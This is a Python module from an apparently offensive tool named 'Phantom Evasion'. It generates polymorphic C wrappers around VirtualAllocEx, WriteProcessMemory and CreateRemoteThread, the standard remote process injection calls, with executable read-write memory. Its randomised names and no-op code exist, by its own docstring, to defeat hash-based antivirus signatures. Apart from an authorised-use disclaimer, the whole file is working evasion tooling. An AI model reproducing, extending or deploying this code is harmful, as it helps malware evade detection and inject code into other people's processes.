"""
Phantom Evasion - Polymorphic Code Generator

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

import random
import string
from typing import Dict, Any, List


def _rand_id(length: int = 8) -> str:
    """Generate a random C identifier."""
    first = random.choice(string.ascii_letters + "_")
    rest = "".join(random.choices(string.ascii_letters + string.digits + "_", k=length - 1))
    return first + rest


def generate_polymorphic_code() -> Dict[str, Any]:
    """Generate polymorphic C code with randomised variable and function names.

    Each call produces structurally identical but lexically different code,
    defeating simple hash-based AV signatures.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``,
        ``alloc_fn``, ``write_fn``, ``exec_fn``.
    """
    # Randomised symbol names used throughout the loader
    alloc_fn = _rand_id(12)
    write_fn = _rand_id(12)
    exec_fn  = _rand_id(12)
    handle_var = _rand_id(8)
    addr_var   = _rand_id(8)
    tid_var    = _rand_id(8)
    sz_var     = _rand_id(6)
    pid_var    = _rand_id(6)

    # Random no-op operation to vary code structure
    noop_val = random.randint(1, 0xFFF)
    noop_var = _rand_id(8)

    code = f"""\
#ifndef __PHANTOM_POLYMORPHIC__
#define __PHANTOM_POLYMORPHIC__
// Polymorphic Variable/Function Naming – generated by Phantom Evasion
// Layer 1 – Static Evasion
// Symbol table: alloc={alloc_fn}, write={write_fn}, exec={exec_fn}

#define {alloc_fn}_IMPL VirtualAllocEx
#define {write_fn}_IMPL WriteProcessMemory
#define {exec_fn}_IMPL  CreateRemoteThread

static inline void *{alloc_fn}(HANDLE h, SIZE_T sz) {{
    volatile int {noop_var} = {noop_val} ^ {noop_val ^ 0xAB};
    (void){noop_var};
    return {alloc_fn}_IMPL(h, NULL, sz,
                            MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
}}

static inline BOOL {write_fn}(HANDLE h, LPVOID addr,
                                LPCVOID data, SIZE_T sz) {{
    SIZE_T written = 0;
    return {write_fn}_IMPL(h, addr, data, sz, &written);
}}

static inline HANDLE {exec_fn}(HANDLE h, LPVOID start) {{
    return {exec_fn}_IMPL(h, NULL, 0,
                          (LPTHREAD_START_ROUTINE)start, NULL, 0, NULL);
}}
#endif /* __PHANTOM_POLYMORPHIC__ */
"""

    return {
        "code": code,
        "description": "Polymorphic symbol renaming (alloc/write/exec wrappers)",
        "layer": "Layer 1 - Static Evasion",
        "name": "polymorphic",
        "alloc_fn": alloc_fn,
        "write_fn": write_fn,
        "exec_fn": exec_fn,
    }
